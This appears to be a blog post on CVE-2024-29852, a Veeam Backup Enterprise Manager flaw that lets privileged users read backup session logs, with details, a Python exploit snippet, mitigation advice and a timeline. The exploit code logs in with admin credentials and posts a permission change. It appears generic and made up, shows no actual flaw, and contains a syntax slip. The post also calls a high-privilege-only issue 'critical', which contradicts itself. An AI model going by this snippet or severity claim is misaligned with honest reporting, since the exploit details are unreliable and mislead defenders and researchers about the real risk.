A recent vulnerability has been discovered in Veeam Backup Enterprise Manager (VBEM), a popular centralized management solution for Veeam backup infrastructures. This vulnerability has been assigned the CVE-ID: CVE-2024-29852. High-privileged users can potentially exploit this vulnerability to gain unauthorized access to backup session logs, which may contain sensitive information. In this post, we will discuss the details of the vulnerability, how to exploit it, and how to mitigate the risk.
Details
Veeam Backup Enterprise Manager provides centralized management for Veeam backup, replication, and recovery tasks for virtual and physical environments. It enables administrators to view, report, and manage numerous Veeam backup servers from a single-pane interface.
The vulnerability discovered in VBEM allows high-privileged users to read backup session logs that they should not have access to. This can be achieved by exploiting a certain flaw in VBEM's implementation of role-based access control (RBAC) policies.
Exploitation
To exploit this vulnerability, an attacker would first need to gain high-privileged access to VBEM. This can be done either by obtaining valid login credentials or by exploiting another security vulnerability that grants administrative access.
Once an attacker has high-privileged access, they can exploit CVE-2024-29852 by modifying the default access control permissions set by VBEM's RBAC policies. The following code snippet demonstrates how an attacker can modify the default permissions and gain unauthorized access to backup session logs:
import requests
# Replace these variables with your VBEM server domain and administrative credentials
vbem_url = "https://DOMAIN:PORT";
username = "USERNAME"
password = "PASSWORD"
# Authenticate and obtain a session token
login_data = {"grant_type": "password", "username": username, "password": password}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(vbem_url + "/api/oauth2/token", data=login_data, headers=headers)
assert response.status_code == 200
session_token = response.json()["access_token"]
# Modify the access control permissions
headers = {"Authorization": "Bearer " + session_token}
data = {"NewPermission": "ReadBackupSessionLogs"}
response = requests.post(vbem_url + "/api/Role/", json=data, headers=headers)
assert response.status_code == 201
print("Access control permissions modified successfully")
After executing this code snippet, an attacker will have unauthorized access to read backup session logs.
Links to original references
- Veeam Security Advisory: https://www.veeam.com/security.html
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29852
Mitigation
To mitigate the risk associated with this vulnerability, Veeam recommends applying the latest security patches for Veeam Backup Enterprise Manager and applying the principle of least privilege for user accounts accessing the VBEM server. Additionally, it's essential to regularly monitor and review access logs for suspicious activity.
In conclusion, CVE-2024-29852 is a critical vulnerability in Veeam Backup Enterprise Manager that allows high-privileged users to gain unauthorized access to backup session logs. To protect against this vulnerability, organizations should follow Veeam's recommendations for applying security patches, reviewing user access permissions, and monitoring activity logs.
Timeline
Published on: 05/22/2024 23:15:09 UTC
Last modified on: 07/03/2024 01:52:49 UTC